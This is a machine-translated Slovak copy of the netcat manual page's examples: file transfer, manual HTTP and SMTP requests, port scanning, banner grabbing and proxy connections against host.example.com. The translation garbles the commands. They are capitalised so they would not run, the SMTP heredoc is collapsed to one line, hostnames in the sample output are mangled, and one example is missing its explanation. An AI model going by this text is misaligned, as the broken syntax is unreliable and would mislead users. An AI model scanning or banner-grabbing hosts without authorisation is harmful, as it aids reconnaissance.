(výzva shellu z hostiteľa.example.com)
Začnite používaním nc počúvať na konkrétnom porte s výstupom zachyteným do súboru:
Nc -l 1234 > názov_súboru.out
Pomocou druhého zariadenia sa pripojte k počúvaniu nc proces, ktorý mu dodá súbor, ktorý sa má preniesť:
Nc host.example.com 1234< filename.in
Po prenesení súboru sa pripojenie automaticky ukončí.
Rozhovor so servermi
Niekedy je užitočné hovoriť so servermi „ručne“ a nie cez používateľské rozhranie. Môže pomôcť pri riešení problémov, keď môže byť potrebné overiť, aké údaje server odosiela ako odpoveď na príkazy vydané klientom. Ak chcete napríklad získať domovskú stránku webovej lokality:
Printf "GET / HTTP/1.0\r\n\r\n" | nc host.example.com 80
Všimnite si, že toto zobrazuje aj hlavičky odoslané webovým serverom. Dajú sa filtrovať, pomocou nástroja ako napr sed, Ak je to nevyhnutné.
Zložitejšie príklady môžu byť zostavené, keď používateľ pozná formát požiadaviek požadovaný serverom. Ako ďalší príklad je možné odoslať e-mail na server SMTP pomocou:
Nc [-C] localhost 25<< EOF HELO host.example.com MAIL FROM:< >RCPT TO:< >ÚDAJE Telo e-mailu. . UKONČIŤ EOF
Skenovanie portov
Môže byť užitočné vedieť, ktoré porty sú otvorené a spustia služby na cieľovom počítači. The -z vlajka môže byť použitá na zistenie nc na hlásenie otvorených portov namiesto iniciovania pripojenia. Zvyčajne je užitočné zapnúť podrobný výstup do stderr pomocou tejto možnosti v spojení s -v možnosť.
Nc -zv host.example.com 20-30 Pripojenie k portu host.example.com 22 bolo úspešné! Pripojenie k portu host.example.com 25 bolo úspešné!
Rozsah portov bol zadaný na obmedzenie vyhľadávania na porty 20 - 30 a skenuje sa podľa rastúceho poradia.
Môžete tiež zadať zoznam portov na skenovanie, napríklad:
Nc -zv host.example.com 80 20 22 nc: pripojenie k hostiteľovi.example.com 80 (tcp) zlyhalo: Pripojenie odmietnuté nc: pripojenie k hostiteľovi.example.com 20 (tcp) zlyhalo: Pripojenie odmietnuté Pripojenie k hostiteľovi.priklad Port .com bol úspešný!
Porty sa skenujú podľa zadaného poradia.
Prípadne môže byť užitočné vedieť, ktorý serverový softvér je spustený a aké verzie. Tieto informácie sú často obsiahnuté v pozdravných banneroch. Ak ich chcete získať, je potrebné najprv vytvoriť spojenie a potom spojenie prerušiť, keď bol banner načítaný. Dá sa to dosiahnuť zadaním malého časového limitu pomocou -w príznakom alebo možno zadaním príkazu „QUIT“ pre server:
Echo "QUIT" | nc host.example.com 20-30 SSH-1.99-OpenSSH_3.6.1p2 Nezhoda protokolu. 220 host.example.com IMS SMTP prijímač Verzia 0.84 pripravený
Príklady
nc -p 31337 -w 5 host.example.com 42Otvorí pripojenie TCP k portu 42 z host.example.com pomocou portu 31337 ako zdrojový port s časovým limitom 5 sekúnd.
Nc -u host.example.com 53 nc -x10.2.3.4:8080 -Xconnect -Pruser host.example.com 42
Rovnaké ako vo vyššie uvedenom príklade, ale tentoraz je povolené overenie proxy servera s používateľským menom " Ruser"ak to proxy vyžaduje.
Súvisiace príkazy
ifconfig— Zobrazenie alebo úprava konfigurácie sieťových rozhraní.